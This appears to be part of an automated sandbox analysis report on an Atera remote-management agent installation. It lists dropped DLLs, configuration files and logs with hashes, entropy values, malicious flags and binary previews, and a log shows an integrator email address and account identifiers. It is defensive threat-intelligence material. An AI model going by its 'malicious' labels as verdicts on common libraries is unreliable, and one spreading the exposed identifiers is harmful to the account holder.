                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<V.........." ..0.................. .........c. ....................... ......s.....`.................................P...O.......H...............((........................................................... ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........".................."..P............................................................................................0.......................0.......................................................................................0...............0...................................................................................................0...............0...................................................0...............0..........................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):753
                                                                                                                                                                                                                                        Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                        MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                        SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                        SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                        SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallState

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7466
                                                                                                                                                                                                                                        Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                        MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                        SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                        SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                        SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250
                                                                                                                                                                                                                                        Entropy (8bit):5.131137827189028
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:AcMQ89w3pKFSQd0Au7RAsHG1ocWMLXVII1DE5lXVILUFvDX:37MSQd5u7ZHQkMj+EEj+gF7X
                                                                                                                                                                                                                                        MD5:1533712A268FF6629C2D6DBFAEF301D4
                                                                                                                                                                                                                                        SHA1:5B7EC56371F32390E5BE7A3F058726837AD2B523
                                                                                                                                                                                                                                        SHA-256:1EFFE0EF3BDC8646CFE0115D2C25AFCC3122085E860134D33DFFF3EDB4CB5701
                                                                                                                                                                                                                                        SHA-512:51466D0AED8135D5AC7F42EDE6158F7C96ECD086003CAA14E831E33347D65AC694A9F9D9E4ED79AFE50897051204D5E9110C4195F5F2402634DB520FC4B03C01
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:/i /IntegratorLogin=primepecasuti@gmail.com /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000OgujIIAR /AgentId=ef8472c8-8ede-4877-a4a2-21e52a229933.17/12/2024 12:45:28 Trace Starting..17/12/2024 12:45:51 Trace Starting..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\inprocmessaging\trayProcessMessages.json

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):178
                                                                                                                                                                                                                                        Entropy (8bit):5.315962266441263
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:5PbTsPjN2mq+pxPrVVqSdDc6UgMHDxZfg02c0uNShoWARoyYkmc7JP/VD2DZHeGq:RbTsFVvqacRgMHDrfzFNgAvm4HYDKiwP
                                                                                                                                                                                                                                        MD5:9EED42F07570C1810680FB4658503D3B
                                                                                                                                                                                                                                        SHA1:A9B7A1385DB38FA2A6BA93AB6F78DCFBE58643E7
                                                                                                                                                                                                                                        SHA-256:C2C181FAF72EB862430A0C6BCCB396CBAD17DBB8A35346755EB7691C79C25D8A
                                                                                                                                                                                                                                        SHA-512:0E5385D1A85FDCCD7565A9D20A0688F9FD738D82C4531BC0C88CB15DF26E75575AE38AC938503A30AC5CA7F34CEE423BCAFB00E215A4F1A752F52BCFD1AF74C9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:eyJJZCI6IjFhNGQzODQxLTU1NWItNDUzZS1iODdjLTFiMjhhNGFlYjg4YiIsIkNyZWF0ZWQiOiIyMDI0LTEyLTE3VDEyOjQ2OjQwLjM3NjA4MS0wNTowMCIsIk1lc3NhZ2UiOiJfSU5JVF8iLCJUaW1lb3V0IjoiMDA6MDE6MDAifQ==..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250
                                                                                                                                                                                                                                        Entropy (8bit):5.131137827189028
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:AcMQ89w3pKFSQd0Au7RAsHG1ocWMLXVII1DE5lXVILUFvDX:37MSQd5u7ZHQkMj+EEj+gF7X
                                                                                                                                                                                                                                        MD5:1533712A268FF6629C2D6DBFAEF301D4
                                                                                                                                                                                                                                        SHA1:5B7EC56371F32390E5BE7A3F058726837AD2B523
                                                                                                                                                                                                                                        SHA-256:1EFFE0EF3BDC8646CFE0115D2C25AFCC3122085E860134D33DFFF3EDB4CB5701
                                                                                                                                                                                                                                        SHA-512:51466D0AED8135D5AC7F42EDE6158F7C96ECD086003CAA14E831E33347D65AC694A9F9D9E4ED79AFE50897051204D5E9110C4195F5F2402634DB520FC4B03C01
